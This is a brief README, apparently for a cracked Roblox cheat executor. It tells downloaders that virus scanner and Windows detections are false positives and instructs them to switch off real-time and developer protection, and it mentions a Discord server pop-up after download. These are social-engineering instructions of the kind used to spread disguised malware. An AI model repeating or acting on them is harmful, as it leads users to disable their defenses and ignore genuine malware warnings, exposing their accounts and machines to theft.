Arctic0523/roblox-executor-cracka/README.md

+virus scanner websites will flag it with multiple random softwares we DONT use we cannot fix this as it is apart of the executor code

 turn off allat windows saftey or it wont work just turn off real time and dev protection! discord server pop-up after download any virus or "malware" windows detects is false postivie